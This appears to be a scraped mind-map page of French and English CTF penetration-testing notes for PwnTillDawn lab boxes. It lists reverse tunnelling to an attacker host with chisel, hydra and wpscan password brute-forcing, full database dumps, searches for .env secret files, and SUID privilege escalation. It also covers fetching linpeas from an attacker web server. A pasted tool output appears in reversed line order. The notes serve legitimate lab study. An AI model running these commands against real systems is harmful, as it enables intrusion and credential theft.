Pwntilldawn Mindmap FULL

もっと見る

MI PLE

Alexsander ´Porras Floresにより

Edwin Y. Chivigorri Arana

edwin chivigorri aranaにより

RISKS ON THE INTERNET

Eike Berrociにより

Math Skill Building Workshop

Dan Oにより

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding

Si on a un acces SSH

sshuttle -r user@ip -N

Web en écoute sur localhost

Sur la victime

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Ne pas oublier d'adapter le port 8080 selon les situations

Sur l'host

chisel server -port 7777 --reverse

Verifier ce qui écoute sur localhost

NMAP

nmap -sV -sC -T5 -p- ip

Nmap Automator

nmap -sV -Pn -p- -T5 ip

sudo nmap -sF -p1-100 -T4

Protocoles divers

DNS

! AXFR !

dig @mortysserver.com mortysserver.com axfr

Ajout dans /etc/hosts si besoin

Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH

Test de se co pour la bannière

Connexion si on a la clé privée

ssh -i id_rsa user@ip

POP3

hydra -l operator -P wordlist.txt ip pop3

Mysql

mysql -h localhost -u sql_user -p

mysqldump -u root -p --all-databases > alldb.sql

FTP

Login anon à vérif

showmount -e IP

NFS

sudo mount -t nfs ip:/remote /local

sudo umount 10.150.150.59:/nfsroot

Subtopic

rpcinfo IP

SMTP

hydra -l operator -P wordlist.txt ipip smtp

smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup

netstat -antup

Dumb shell upgrade

python -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'

asterisk@Billing:/tmp$ cd /usr/local/src/magn

ctory

script /dev/null -qc /bin/bash

Si besoin des erreurs mais pas affichée ( ex webshell php )

Ajout de "2>fichier" apres la commande

puis faire un cat du fichier

Could not connect to https://bricks.thm/ due to SSL errors (run with -k to ignore), skipping...

=> error sending request for url (https://bricks.thm/): error trying to connect: error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:2091: (self-signed certificate)ERROR: Could not connect to any target provided

──────────────────────────────────────────────────

───────────────────────────┴──────────────────────

🏁 Press [ENTER] to use the Scan Management Menu™

───────────────────────────┬──────────────────────

🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest

🔃 Recursion Depth │ 4

🏁 HTTP methods │ [GET]

🔎 Extract Links │ true

🦡 User-Agent │ feroxbuster/2.10.3

💥 Timeout (secs) │ 7

👌 Status Codes │ All Status Codes!

📖 Wordlist │ /usr/share/wordlists/dirb/big.txt

🚀 Threads │ 50

🎯 Target Url │ https://bricks.thm/

by Ben "epi" Risher 🤓 ver: 2.10.3

| |___ | \ | \ | \__, \__/ / \ | |__/ |___

|__ |__ |__) |__) | / ` / \ \_/ | | \ |__

anthony@NS5x-NS7xAU:~/Desktop/tools/UDF$ feroxbuster --url https://bricks.thm/ --wordlist /usr/share/wordlists/dirb/big.txt

___ ___ __ __ __ __ __ ___

Find files

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"

Linux

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

find ./* | grep FLAG3

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

find / -name FLAG6.txt 2>/dev/null

find / -type f -name ".env" 2>/dev/null

Privesc

SUID

find / -perm -u=s -type f 2>/dev/null

searchsploit

searchsploit -m chemin

searchsploit xxxx

Python Library Hijacking

Script qui tourne en root avec des imports de librairies

LXC/LXD

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

Metasploit

Upgrade session : sessions -u

Windows

Shell

Upgrade shell

sessions -u id

ps --> migrate pid

msfconsole

multi/recon/localexploitsuggester

linpeas

sudo python3 -m http.server port ( attaquant ) et wget

Lien symbolique

ln -s /root /home/michael/importantfiles/rootbackup

WEB

Wordpress

Bruteforce

wpscan --url url_wordpress --passwords wordlist

Enumération users

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u

Check template et plugins vulnérables

wpscan --url url --enumerate vp,vt

PHP Filters

python3 script.py --chain ''

https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py

Enumération

Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k pour certif autosigné

Bruteforce Forms

Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit

Depixelise

Unredactor

Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Stereogram

https://piellardj.github.io/stereogram-solver/

Aperisolve

Steghide

steghide extract -sf screen.jpeg